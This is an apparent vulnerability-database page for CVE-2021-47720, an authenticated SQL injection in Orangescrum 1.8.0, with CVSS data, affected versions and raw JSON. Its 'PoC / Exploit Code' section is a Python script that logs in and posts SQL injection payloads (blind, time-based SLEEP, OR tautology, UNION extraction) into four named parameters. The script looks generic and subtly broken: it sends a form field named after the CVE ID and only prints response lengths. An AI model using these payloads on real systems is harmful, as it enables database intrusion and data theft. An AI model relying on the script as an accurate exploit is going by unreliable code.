Security Vulnerability Report
CVE-2021-47720 CVSS 7.1 HIGH

CVE-2021-47720

Published: 2025-12-23 20:15:44
Last Modified: 2025-12-31 17:15:30

Description

Orangescrum 1.8.0 contains an authenticated SQL injection vulnerability that allows authorized users to manipulate database queries through multiple vulnerable parameters. Attackers can inject malicious SQL code into parameters like old_project_id, project_id, uuid, and uniqid to potentially extract or modify database information.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:orangescrum:orangescrum:1.8.0:*:*:*:*:*:*:* - VULNERABLE
Orangescrum < 1.8.0 (affected)
Orangescrum 1.8.0 (confirmed affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2021-47720 SQL Injection PoC for Orangescrum 1.8.0
# Authenticated SQL injection via multiple parameters

target_url = "http://target-server/orangescrum/"
login_url = target_url + "index.php?er=320"
api_url = target_url + "api/"

# Authentication credentials (low-privilege user)
credentials = {
    "email": "[email protected]",
    "password": "password123"
}

# SQL Injection payload examples
# Boolean-based blind injection
injection_payloads = {
    "project_id": "1' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)-- ",
    "old_project_id": "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)-- ",
    "uuid": "' OR '1'='1",
    "uniqid": "' UNION SELECT NULL,version(),user(),database()-- "
}


def login():
    """Authenticate and obtain session cookie"""
    session = requests.Session()
    response = session.post(login_url, data=credentials)
    if "error" not in response.url:
        return session
    return None


def exploit_sqli(session, param_name, payload):
    """Execute SQL injection attack"""
    data = {
        "CVE-2021-47720": "1",
        param_name: payload
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    response = session.post(api_url, data=data, headers=headers, timeout=30)
    return response.text


if __name__ == "__main__":
    print("[*] Starting CVE-2021-47720 Exploitation")
    session = login()
    if session:
        print("[+] Authentication successful")
        for param, payload in injection_payloads.items():
            print(f"[*] Testing parameter: {param}")
            result = exploit_sqli(session, param, payload)
            print(f"[*] Response length: {len(result)}")
    else:
        print("[-] Authentication failed")
```

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47720", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:44.347", "lastModified": "2025-12-31T17:15:29.683", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Orangescrum 1.8.0 contains an authenticated SQL injection vulnerability that allows authorized users to manipulate database queries through multiple vulnerable parameters. Attackers can inject malicious SQL code into parameters like old_project_id, project_id, uuid, and uniqid to potentially extract or modify database information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:orangescrum:orangescrum:1.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "0BFFFA2F-2A4C-43C5-8C33-4E74A44AD16E"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50553", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.orangescrum.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/orangescrum-authenticated-sql-injection-via-multiple-parameters", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}